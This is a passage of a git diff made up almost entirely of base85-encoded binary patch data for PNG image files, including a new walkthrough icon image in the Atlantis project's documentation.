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

literal 0
HcmV?d00001

diff --git a/runatlantis.io/docs/images/atlantis-walkthrough-icon.png b/runatlantis.io/docs/images/atlantis-walkthrough-icon.png
new file mode 100644
index 0000000000000000000000000000000000000000..915c6a15875becebd8e1103118aa7099940a2824
GIT binary patch
literal 79344
zcmZU(Wl$Yavo4IgySoK<hmE^C1b26L*Nr<tf_osiYY6V{?(S^#<~{d*=bWl<s-|j9
